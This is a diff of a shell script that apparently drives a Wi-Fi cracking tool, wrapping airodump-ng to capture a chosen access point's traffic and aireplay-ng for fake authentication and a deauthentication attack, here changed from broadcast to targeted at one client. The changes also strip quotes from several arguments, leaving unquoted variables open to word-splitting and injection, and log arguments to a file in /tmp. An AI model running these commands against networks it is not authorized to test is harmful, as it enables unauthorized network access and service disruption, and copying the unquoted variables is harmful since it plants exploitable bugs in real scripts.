@@ -15,7 +15,7 @@
 # * name comes from http://www.thefreedictionary.com/cleave      #
 ##################################################################
 #                                                                # 
-# last changed in version = '1.11-1'                             #
+# last changed in version = '1.12-3'                             #
 #                                                                # 
 ##################################################################
 
@@ -58,7 +58,7 @@ if [ "$1" == 'getWlanInformation' ]; then
 fi 
 
 if [ "$1" == 'readESSIDs' ]; then
-    cat $2/wlanInfo-01.csv | grep -e $3 | awk -F"," 'BEGIN {OFS = ","}; {print $14}'
+    cat $2/wlanInfo-01.csv | grep -e "$3" | awk -F"," 'BEGIN {OFS = ","}; {print $14}'
 fi 
 
 if [ "$1" == 'readESSIDinfo' ]; then 
@@ -73,23 +73,32 @@ fi
 #open a new xterm window for the following requests
 
 if [ "$1" == 'capture' ]; then
+    echo $1 $2 $3 $4 $5 "$6" >> /tmp/clevenTest.txt
     if [ "$5" == 'WPA' ]; then
-       airodump-ng --channel $2 --bssid $3 --write $4/capturedData/$5/"$6" wlan0
+       airodump-ng --channel $2 --bssid $3 --write $4/capturedData/$5/$6 wlan0
     else
-       airodump-ng --ivs --channel $2 --bssid $3 --write $4/capturedData/$5/"$6" wlan0
+       airodump-ng --ivs --channel $2 --bssid $3 --write $4/capturedData/$5/$6 wlan0
     fi   
 fi 
 
 if [ "$1" == 'authenticate' ]; then
-    aireplay-ng -1 5 -q 10 -a $2 -h $3 -e "$4" wlan0
+
+    ## 1. Spaces should be handled in the main program 
+    aireplay-ng -1 5 -q 10 -a $2 -h $3 -e $4 wlan0
+    
+    ## 2. Workaround version for handling spaces
+    # if    [ "$#" == '4' ]; then
+        # aireplay-ng -1 5 -q 10 -a $2 -h $3 -e $4 wlan0
+    # elif  [ "$#" == '5' ]; then
+        # aireplay-ng -1 5 -q 10 -a $2 -h $3 -e "$4 $5" wlan0
+    # elif  [ "$#" == '6' ]; then
+        # aireplay-ng -1 5 -q 10 -a $2 -h $3 -e "$4 $5 $6" wlan0
+    # fi   
+    echo $1 $2 $3 $4 >> /tmp/clevenTest.txt
 fi 
 
 if [ "$1" == 'deauthenticate' ]; then 
-    ##1. direct/targeted 
-    # aireplay-ng -0 5 -a $2 -c $3 wlan0
-    
-    ##2. broadcast
-    aireplay-ng -0 5 -a $2 wlan0
+    aireplay-ng -0 5 -a $2 -c $3 wlan0
 fi 
 
 if [ "$1" == 'injection' ]; then 
